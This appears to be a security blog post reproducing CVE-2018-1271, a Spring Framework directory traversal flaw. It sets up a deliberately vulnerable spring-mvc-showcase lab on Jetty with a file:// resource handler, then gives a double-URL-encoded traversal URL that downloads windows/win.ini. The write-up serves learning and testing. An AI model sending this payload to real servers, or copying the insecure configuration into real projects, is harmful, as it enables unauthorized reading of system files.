Written by SlidingWindow

Spring Framework Directory Traversal Vulnerability (CVE-2018-1271)

It’s too late for this blog post but I’ve been caught up with other tasks so couldn’t post this earlier.  Anyways, in this blog, we’ll look at how to setup a vulnerable target for CVE-2018-1271 and exploit it.

The issue exists in Spring Framework versions 5.0 to 5.0.4, 4.3 to 4.3.14,  allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). It should be noted that there are a few conditions for this vulnerability to be introduced:

  1. The target server is running on Windows.
  2. The application is running jetty
  3. And, application serves files from the file system using file:// protocol

Setting up a vulnerable target:

1. Install JDK 1.8 or higher.

2. Download and setup Maven 3.6.0 to C:\Opt\apache-maven-3.6.0

3. Configure Environment Variables:

  • Set JAVA_HOME to C:\Program Files (x86)\Java\jdk1.8.0_171\ or any the path where it’s installed.
  • Set MAVEN_HOME to C:\Opt\apache-maven-3.6.0\
  • Append MAVEN_HOME path to PATH variable: C:\Opt\apache-maven-3.6.0\bin\
  • Launch command prompt and make sure following commands work:
    • mvn -version
    • java -version

4. Now download spring-mvc-showcase sample application either via GIT or download the ZIP:  git clone https://github.com/spring-projects/spring-mvc-showcase.git

5. CD into spring-mvc-showcase-master directory.

6. Edit POM.XML and set org.springframework-version to 5.0.0:

POM.XML
Change SpringFramework version to 5.0.0

7. Locate WebMvcConfig.java, it’s usually under ./src/main/java/org/springframework/samples/mvc/config/WebMvcConfig.java

8. Edit WebMvcConfig.java and set registry.addResourceHandler to following. This is what makes it vulnerable to Directory Traversal:

registry.addResourceHandler("/resources/**").addResourceLocations("file:./src/main/resources/","/resources/");

WebMvcConfig.java
Modify WebMvcConfig.java to use file:// directive

9. Now start the project with jetty:

mvn jetty:run

10. Make sure the server is listening on the port specified, usually port 8080.
11. Now visit following link:

http://:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

12. This should download the WIN.INI file:

Exploiting Path Traversal
Arbitrary file download
WIN.INI
WIN.INI downloaded

References:

Spoock Blog

SeeBugPaper665

Installing Maven on Windows

Leave a comment